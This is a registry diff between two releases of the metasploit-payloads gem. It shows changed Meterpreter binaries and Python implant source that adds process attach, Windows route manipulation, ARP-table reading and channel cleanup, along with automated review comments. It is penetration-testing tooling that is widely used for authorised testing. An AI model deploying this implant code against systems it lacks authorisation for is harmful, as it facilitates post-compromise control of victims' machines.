metasploit-payloads 2.0.117 → 2.0.119
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +108 -13
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/meterpreter.py +27 -25
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: b67e513ed92128da0555d06d5700100438229971a8750aefac72059efec74eb8
|
|
4
|
+
data.tar.gz: 90a3af70071ac13b8b29db40a47868c5221361e14ad21aec997d1cfb52634d03
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c961adbd35fd2999240f21e45383fa2ebd11edae361b65858361989ca32decc61d79b0259dcc0892ec65d714baed184f00d16499a6c4d5454599d268511c90ae
|
|
7
|
+
data.tar.gz: 7d90eebd468b2f28d536d395e62a29a4f1f342a72fa7141f2c4816887331e7cd5cea21906f8c717fb2b056f09fe316091171ba64170c728f87e7086773e7e95c
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
|
Binary file
|
data/data/android/metstage.jar
CHANGED
|
Binary file
|
data/data/android/shell.jar
CHANGED
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -1002,6 +1002,9 @@ def getaddrinfo_from_request(request, socktype, proto):
|
|
|
1002
1002
|
local_address_info = None
|
|
1003
1003
|
return peer_address_info, local_address_info
|
|
1004
1004
|
|
|
1005
|
+
def addr_atoi4(address):
|
|
1006
|
+
return struct.unpack('!I', socket.inet_aton(address))[0]
|
|
1007
|
+
|
|
1005
1008
|
def netlink_request(req_type, req_data):
|
|
1006
1009
|
# See RFC 3549
|
|
1007
1010
|
NLM_F_REQUEST = 0x0001
|
|
@@ -1336,6 +1339,28 @@ def stdapi_sys_config_sysinfo(request, response):
|
|
|
1336
1339
|
response += tlv_pack(TLV_TYPE_ARCHITECTURE, get_system_arch())
|
|
1337
1340
|
return ERROR_SUCCESS, response
|
|
1338
1341
|
|
|
1342
|
+
@register_function_if(has_windll)
|
|
1343
|
+
def stdapi_sys_process_attach(request, response):
|
|
1344
|
+
pid = packet_get_tlv(request, TLV_TYPE_PID)['value']
|
|
1345
|
+
if not pid:
|
|
1346
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1347
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1348
|
+
handle = GetCurrentProcess()
|
|
1349
|
+
else:
|
|
1350
|
+
inherit = packet_get_tlv(request, TLV_TYPE_INHERIT)['value']
|
|
1351
|
+
permissions = packet_get_tlv(request, TLV_TYPE_PROCESS_PERMS)['value']
|
|
1352
|
+
|
|
1353
|
+
OpenProcess = ctypes.windll.kernel32.OpenProcess
|
|
1354
|
+
OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_bool, ctypes.c_uint32]
|
|
1355
|
+
OpenProcess.restype = ctypes.c_void_p
|
|
1356
|
+
handle = OpenProcess(permissions, inherit, pid)
|
|
1357
|
+
if not handle:
|
|
1358
|
+
return error_result_windows(), response
|
|
1359
|
+
meterpreter.processes[handle] = None
|
|
1360
|
+
debug_print('[*] added process id: ' + str(pid) + ', handle: ' + str(handle))
|
|
1361
|
+
response += tlv_pack(TLV_TYPE_HANDLE, handle)
|
|
1362
|
+
return ERROR_SUCCESS, response
|
|
1363
|
+
|
|
1339
1364
|
@register_function
|
|
1340
1365
|
def stdapi_sys_process_close(request, response):
|
|
1341
1366
|
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)['value']
|
|
@@ -1901,19 +1926,22 @@ def stdapi_net_config_get_arp_table(request, response):
|
|
|
1901
1926
|
if not os.path.exists(arp_cache_file):
|
|
1902
1927
|
return ERROR_NOT_SUPPORTED, response
|
|
1903
1928
|
|
|
1904
|
-
|
|
1905
|
-
|
|
1906
|
-
|
|
1907
|
-
|
|
1908
|
-
|
|
1909
|
-
|
|
1910
|
-
|
|
1911
|
-
|
|
1912
|
-
|
|
1913
|
-
|
|
1914
|
-
|
|
1915
|
-
|
|
1916
|
-
|
|
1929
|
+
arp_cache = open('/proc/net/arp', 'r')
|
|
1930
|
+
lines = arp_cache.readlines()
|
|
1931
|
+
for line in lines[1:]:
|
|
1932
|
+
fields = line.split()
|
|
1933
|
+
ip_address = fields[0]
|
|
1934
|
+
mac_address = fields[3]
|
|
1935
|
+
mac_address = bytes().join(binascii.unhexlify(h) for h in mac_address.split(':'))
|
|
1936
|
+
interface_name = fields[5]
|
|
1937
|
+
arp_tlv = bytes()
|
|
1938
|
+
arp_tlv += tlv_pack(TLV_TYPE_IP, socket.inet_aton(ip_address))
|
|
1939
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, mac_address)
|
|
1940
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_NAME, interface_name)
|
|
1941
|
+
response += tlv_pack(TLV_TYPE_ARP_ENTRY, arp_tlv)
|
|
1942
|
+
arp_cache.close()
|
|
1943
|
+
else:
|
|
1944
|
+
return ERROR_NOT_SUPPORTED, response
|
|
1917
1945
|
return ERROR_SUCCESS, response
|
|
1918
1946
|
|
|
1919
1947
|
@register_function
|
|
@@ -2124,6 +2152,73 @@ def stdapi_net_config_get_routes(request, response):
|
|
|
2124
2152
|
response += tlv_pack(TLV_TYPE_NETWORK_ROUTE, route_tlv)
|
|
2125
2153
|
return ERROR_SUCCESS, response
|
|
2126
2154
|
|
|
2155
|
+
def _win_route_add_remove(is_add, request, response):
|
|
2156
|
+
class IPAddr(ctypes.Structure):
|
|
2157
|
+
_fields_ = [
|
|
2158
|
+
("S_addr", ctypes.c_ulong)]
|
|
2159
|
+
|
|
2160
|
+
MIB_IPROUTE_TYPE_INDIRECT = 4
|
|
2161
|
+
MIB_IPPROTO_NETMGMT = 3
|
|
2162
|
+
|
|
2163
|
+
GetBestInterface = ctypes.windll.Iphlpapi.GetBestInterface
|
|
2164
|
+
GetBestInterface.argtypes = [IPAddr, ctypes.POINTER(ctypes.c_ulong)]
|
|
2165
|
+
GetBestInterface.restype = ctypes.c_ulong
|
|
2166
|
+
|
|
2167
|
+
CreateIpForwardEntry = ctypes.windll.Iphlpapi.CreateIpForwardEntry
|
|
2168
|
+
CreateIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
|
2169
|
+
CreateIpForwardEntry.restype = ctypes.c_ulong
|
|
2170
|
+
|
|
2171
|
+
DeleteIpForwardEntry = ctypes.windll.Iphlpapi.DeleteIpForwardEntry
|
|
2172
|
+
DeleteIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
|
2173
|
+
DeleteIpForwardEntry.restype = ctypes.c_ulong
|
|
2174
|
+
|
|
2175
|
+
GetIpInterfaceEntry = ctypes.windll.Iphlpapi.GetIpInterfaceEntry
|
|
2176
|
+
GetIpInterfaceEntry.argtypes = [ctypes.POINTER(MIB_IPINTERFACE_ROW)]
|
|
2177
|
+
GetIpInterfaceEntry.restype = ctypes.c_ulong
|
|
2178
|
+
|
|
2179
|
+
subnet = packet_get_tlv(request, TLV_TYPE_SUBNET_STRING)['value']
|
|
2180
|
+
netmask = packet_get_tlv(request, TLV_TYPE_NETMASK_STRING)['value']
|
|
2181
|
+
gateway = packet_get_tlv(request, TLV_TYPE_GATEWAY_STRING)['value']
|
|
2182
|
+
|
|
2183
|
+
route = MIB_IPFORWARDROW()
|
|
2184
|
+
route.dwForwardDest = socket.ntohl(addr_atoi4(subnet))
|
|
2185
|
+
route.dwForwardMask = socket.ntohl(addr_atoi4(netmask))
|
|
2186
|
+
route.dwForwardNextHop = socket.ntohl(addr_atoi4(gateway))
|
|
2187
|
+
route.dwForwardType = MIB_IPROUTE_TYPE_INDIRECT
|
|
2188
|
+
route.dwForwardProto = MIB_IPPROTO_NETMGMT
|
|
2189
|
+
route.dwForwardAge = -1
|
|
2190
|
+
route.dwForwardMetric1 = 0
|
|
2191
|
+
|
|
2192
|
+
best_iface = ctypes.c_ulong()
|
|
2193
|
+
ip_addr = IPAddr(socket.ntohl(addr_atoi4(subnet)))
|
|
2194
|
+
result = GetBestInterface(ip_addr, ctypes.byref(best_iface))
|
|
2195
|
+
if result != ERROR_SUCCESS:
|
|
2196
|
+
return error_result_windows(result), response
|
|
2197
|
+
route.dwForwardIfIndex = best_iface
|
|
2198
|
+
|
|
2199
|
+
iface = MIB_IPINTERFACE_ROW(Family=WIN_AF_INET, InterfaceIndex=route.dwForwardIfIndex)
|
|
2200
|
+
result = GetIpInterfaceEntry(ctypes.byref(iface))
|
|
2201
|
+
if result != ERROR_SUCCESS:
|
|
2202
|
+
return error_result_windows(result), response
|
|
2203
|
+
route.dwForwardMetric1 = iface.Metric
|
|
2204
|
+
|
|
2205
|
+
if is_add:
|
|
2206
|
+
result = CreateIpForwardEntry(ctypes.byref(route))
|
|
2207
|
+
else:
|
|
2208
|
+
result = DeleteIpForwardEntry(ctypes.byref(route))
|
|
2209
|
+
if result != ERROR_SUCCESS:
|
|
2210
|
+
return error_result_windows(result), response
|
|
2211
|
+
|
|
2212
|
+
return ERROR_SUCCESS, response
|
|
2213
|
+
|
|
2214
|
+
@register_function_if(has_windll)
|
|
2215
|
+
def stdapi_net_config_add_route(request, response):
|
|
2216
|
+
return _win_route_add_remove(True, request, response)
|
|
2217
|
+
|
|
2218
|
+
@register_function_if(has_windll)
|
|
2219
|
+
def stdapi_net_config_remove_route(request, response):
|
|
2220
|
+
return _win_route_add_remove(False, request, response)
|
|
2221
|
+
|
|
2127
2222
|
def stdapi_net_config_get_routes_via_netlink():
|
|
2128
2223
|
rta_align = lambda l: l+3 & ~3
|
|
2129
2224
|
responses = netlink_request(RTM_GETROUTE, RTMSG(family=socket.AF_UNSPEC))
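Review bot: The `open('/proc/net/arp', 'r')` handle in stdapi_net_config_get_arp_table is only closed on the success path; an `IndexError` from `fields[5]` or a `binascii.Error` from an unexpected hardware-address field on a malformed line propagates out before `arp_cache.close()` runs and leaks the descriptor. The literal path also re-spells what `arp_cache_file` was just tested for with `os.path.exists` (presumably the same file), so if one name drifts from the other the existence check no longer guards the open. Replace the open/close pair with `with open(arp_cache_file, 'r') as arp_cache:` and indent the parsing loop under it, dropping the explicit close. The `else:` at the end of the hunk belongs to an `if` that starts before the hunk, and the function's opening lines are outside it too.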
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -1259,6 +1259,21 @@ class PythonMeterpreter(object):
|
|
|
1259
1259
|
self.next_channel_id += 1
|
|
1260
1260
|
return idx
|
|
1261
1261
|
|
|
1262
|
+
def close_channel(self, channel_id):
|
|
1263
|
+
if channel_id not in self.channels:
|
|
1264
|
+
return False
|
|
1265
|
+
channel = self.channels[channel_id]
|
|
1266
|
+
try:
|
|
1267
|
+
channel.close()
|
|
1268
|
+
except Exception:
|
|
1269
|
+
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
|
1270
|
+
return False
|
|
1271
|
+
del self.channels[channel_id]
|
|
1272
|
+
if channel_id in self.interact_channels:
|
|
1273
|
+
self.interact_channels.remove(channel_id)
|
|
1274
|
+
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
|
1275
|
+
return True
|
|
1276
|
+
|
|
1262
1277
|
def add_process(self, process):
|
|
1263
1278
|
if has_windll:
|
|
1264
1279
|
PROCESS_ALL_ACCESS = 0x1fffff
|
|
@@ -1274,37 +1289,24 @@ class PythonMeterpreter(object):
|
|
|
1274
1289
|
return handle
|
|
1275
1290
|
|
|
1276
1291
|
def close_process(self, proc_h_id):
|
|
1277
|
-
|
|
1278
|
-
if not proc_h:
|
|
1292
|
+
if proc_h_id not in self.processes:
|
|
1279
1293
|
return False
|
|
1280
|
-
|
|
1281
|
-
|
|
1282
|
-
|
|
1283
|
-
|
|
1284
|
-
|
|
1285
|
-
|
|
1286
|
-
|
|
1294
|
+
proc_h = self.processes.pop(proc_h_id)
|
|
1295
|
+
if proc_h:
|
|
1296
|
+
# proc_h is only set when we started the process via execute and not when we attached to it
|
|
1297
|
+
for channel_id, channel in self.channels.items():
|
|
1298
|
+
if not isinstance(channel, MeterpreterProcess):
|
|
1299
|
+
continue
|
|
1300
|
+
if not channel.proc_h is proc_h:
|
|
1301
|
+
continue
|
|
1302
|
+
self.close_channel(channel_id)
|
|
1303
|
+
break
|
|
1287
1304
|
if has_windll:
|
|
1288
1305
|
CloseHandle = ctypes.windll.kernel32.CloseHandle
|
|
1289
1306
|
CloseHandle.argtypes = [ctypes.c_void_p]
|
|
1290
1307
|
CloseHandle.restype = ctypes.c_long
|
|
1291
1308
|
CloseHandle(proc_h_id)
|
|
1292
|
-
debug_print('[*] closed and removed process
|
|
1293
|
-
return True
|
|
1294
|
-
|
|
1295
|
-
def close_channel(self, channel_id):
|
|
1296
|
-
if channel_id not in self.channels:
|
|
1297
|
-
return False
|
|
1298
|
-
channel = self.channels[channel_id]
|
|
1299
|
-
try:
|
|
1300
|
-
channel.close()
|
|
1301
|
-
except Exception:
|
|
1302
|
-
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
|
1303
|
-
return False
|
|
1304
|
-
del self.channels[channel_id]
|
|
1305
|
-
if channel_id in self.interact_channels:
|
|
1306
|
-
self.interact_channels.remove(channel_id)
|
|
1307
|
-
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
|
1309
|
+
debug_print('[*] closed and removed process handle: ' + str(proc_h_id))
|
|
1308
1310
|
return True
|
|
1309
1311
|
|
|
1310
1312
|
def get_packet(self):
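Review bot: In close_process, `self.close_channel(channel_id)` deletes an entry from `self.channels` while the `for channel_id, channel in self.channels.items():` loop over that dict is still live; on Python 3 the `break` on the following line is the only thing preventing a "dictionary changed size during iteration" RuntimeError, which is easy to lose in a later edit. Iterating a snapshot, `for channel_id, channel in list(self.channels.items()):`, keeps the loop safe independent of the break, and the test reads better as `if channel.proc_h is not proc_h:` than `if not channel.proc_h is proc_h:`. The `break` also means only the first channel backed by this proc_h is closed; if that is intentional it deserves a one-line comment such as `# a spawned process owns at most one channel`, hedged if that is not actually guaranteed. close_process is entirely inside the hunk; the moved close_channel in the first hunk is unchanged code and not reviewed here.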
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: metasploit-payloads
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 2.0.
|
|
4
|
+
version: 2.0.119
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- OJ Reeves
|
|
@@ -96,7 +96,7 @@ cert_chain:
|
|
|
96
96
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
|
97
97
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
|
98
98
|
-----END CERTIFICATE-----
|
|
99
|
-
date: 2023-03-
|
|
99
|
+
date: 2023-03-07 00:00:00.000000000 Z
|
|
100
100
|
dependencies:
|
|
101
101
|
- !ruby/object:Gem::Dependency
|
|
102
102
|
name: rake
|
metadata.gz.sig
CHANGED
|
Binary file
|